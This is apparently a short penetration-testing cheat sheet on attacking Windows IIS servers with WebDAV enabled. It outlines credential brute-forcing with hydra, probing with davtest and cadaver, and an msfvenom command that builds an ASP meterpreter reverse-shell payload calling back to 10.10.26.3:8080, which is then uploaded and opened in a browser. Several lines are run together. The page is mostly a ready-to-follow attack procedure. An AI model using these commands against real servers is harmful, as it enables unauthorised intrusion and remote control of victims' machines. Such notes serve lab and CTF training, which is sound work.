iis-windows-abuse
Brute force credentials with hydra.
devtest -auth bob:password -url http://"$ip"/dir
cadaver http://"$ip"/<dir>Exploit (2 ways)
Manual method
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.26.3 lport=8080 --platform windows -f asp > shell.aspcadaver http://"$ip"/webdav
Put the payload to the webserverStart msfconsole, set options and run (same as while generating payloads)Open shell.asp from the browserAutomate method (MSF)
Last updated